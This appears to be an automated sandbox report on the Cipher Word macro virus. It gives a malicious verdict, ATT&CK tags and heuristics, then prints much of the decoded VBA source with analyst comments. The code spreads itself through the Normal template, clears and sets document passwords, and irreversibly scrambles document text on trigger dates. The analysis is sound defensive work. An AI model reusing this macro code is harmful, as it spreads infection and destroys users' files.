Verdict: MALICIOUS
Risk Score: 280
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The sample contains legacy WordBasic auto-exec markers and VBA macros, including AutoOpen and Auto_Close. Critical heuristics indicate the use of the Shell() function within the VBA code, which is used to execute arbitrary commands. The presence of these elements strongly suggests a macro-based malware dropper. The document body's content is nonsensical and appears to be a distraction.
Heuristics (7)
- ClamAV: Doc.Trojan.Cipher-1 (critical; CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Cipher-1
- VBA macros detected (medium; 4 related findings; OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical; OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high; OLE_VBA_AUTOOPEN): AutoOpen macro
- Auto_Close macro (high; OLE_VBA_AUTOCLOSE): Auto_Close macro
- VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium; OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 27288 bytes |

SHA-256: bac174fb9d01a1c187629bc1ce006e9ad1601f5ae369f1752841a4cbf448a31e
Preview script (first 1,000 lines of the extracted script)

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Second module extracted from the same VBA project; the ThisDocument module above contains no procedures.
Attribute VB_Name = "Cipher"

' Win32 API declarations for hiding a window (see SWP_HIDEWINDOW) and locating the Windows directory.
' The procedures that use them (e.g. hideb, spreadIB) fall outside the extracted preview.
Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long
Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Const SWP_HIDEWINDOW = &H80

' Copies the "Cipher" module from the Normal template into the active document
' (template -> document direction), replacing any copy already present.
Sub AutoNew()
Attribute AutoNew.VB_Description = "Macro creata il 30/10/97 da DrJeKiLL"
Attribute AutoNew.VB_ProcData.VB_Invoke_Func = "Project.Cipher.AutoNew"
    On Local Error Resume Next
    For Each Modul In NormalTemplate.VBProject.VBComponents
        If Modul.Name = "Cipher" Then
            Application.OrganizerDelete Source:=ActiveDocument.FullName, Name:="Cipher", Object:=wdOrganizerObjectProjectItems
        End If
    Next Modul
    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Cipher", Object:=wdOrganizerObjectProjectItems
End Sub

' Auto-exec on open: if the document lacks the module, infect it from the template (AutoNew);
' otherwise copy the module from the document into the Normal template (document -> template direction).
' Then clears document passwords and evaluates time/date triggers.
Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Macro creata il 30/10/97 da DrJeKiLL"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Project.Cipher.AutoOpen"
    Dim MacroInDoc As Boolean
    On Local Error GoTo esco
    MacroInDoc = False
    For Each Modul In ActiveDocument.VBProject.VBComponents
        If Modul.Name = "Cipher" Then
            MacroInDoc = True
        End If
    Next Modul
    If MacroInDoc = False Then
        AutoNew
    Else
        For Each Modul In NormalTemplate.VBProject.VBComponents
            If Modul.Name = "Cipher" Then
                Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:="Cipher", Object:=wdOrganizerObjectProjectItems
            End If
        Next Modul
        Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Cipher", Object:=wdOrganizerObjectProjectItems
    End If
    ' Strip any open/write protection from the document.
    If ActiveDocument.HasPassword = True Then ActiveDocument.Password = ""
    If ActiveDocument.WriteReserved = True Then ActiveDocument.WritePassword = ""
    ' Timer is seconds since midnight: 79200 = 22:00. After that hour the document gets a password.
    If Timer > 79200 Then
        ActiveDocument.Password = "MisterCipher"
    End If
    ' WeekDay = 6 is Friday (default vbSunday start). Date triggers call spreadIB (not in the preview).
    If WeekDay(DateValue(Format(Now, "dd/mm/yyyy"))) = 6 Then
        If Format(Now, "dd") = "17" Then spreadIB
    End If
    If Format(Now, "dd") = "31" Then spreadIB
    If Format(Now, "dd/mm") = "25/04" Then spreadIB
    ActiveDocument.Save
esco:
End Sub

' Auto-exec on close: re-runs AutoOpen, then evaluates payload triggers.
Sub AutoClose()
Attribute AutoClose.VB_Description = "Macro creata il 30/10/97 da DrJeKiLL"
Attribute AutoClose.VB_ProcData.VB_Invoke_Func = "Project.Cipher.AutoClose"
    AutoOpen
    On Local Error GoTo ferma
    ' After 22:00: show a message box and call hideb (not in the preview).
    If Timer > 79200 Then
        MsgBox "I say to you that it's " + Format(Now, "hh:mm") + Chr(13) + "It's too late. You must finish to work before next time!!!" + Chr(13) + Chr(9) + "Bye,Bye", vbInformation, "Time Signal"
        hideb
    End If
    ' On 25 April, or on Fridays between 16:00 (57600 s) and 20:00 (72000 s), scramble the document text.
    If Format(Now, "dd/mm") = "25/04" Then
        cphrdoc
        GoTo ferma
    End If
    If WeekDay(DateValue(Format(Now, "dd/mm/yyyy"))) = 6 Then
        If Timer > 57600 And Timer < 72000 Then
            cphrdoc
        End If
    End If
ferma:
End Sub

' Destructive payload: rewrites every word of the document character by character.
' Each character code is multiplied by a random factor (2..11) modulo 256. The factor is
' neither stored nor derivable, so the original text cannot be recovered from the output.
Sub cphrdoc()
Attribute cphrdoc.VB_Description = "Macro creata il 30/10/97 da DrJeKiLL"
Attribute cphrdoc.VB_ProcData.VB_Invoke_Func = "Project.Cipher.cphrdoc"
    Dim parola As String
    Dim temp As String * 1
    Dim a As Integer
    Dim x As Long
    Dim i As Integer
    Dim parmod As String
    Dim myname As String
    Dim mypos As Long
    On Local Error GoTo esch
    Randomize Timer
    For x = 1 To ActiveDocument.Words.Count - 1
        parola = ActiveDocument.Words(x).Text
        parmod = ""
        For i = 1 To Len(parola)
            a = Int(Rnd * 10 + 2)
            temp = Mid(parola, i, 1)
            temp = Chr$((Asc(temp) * a) Mod 256)
            parmod = parmod + temp
        Next i
        ActiveDocument.Words(x).Text = parmod
```

... (truncated)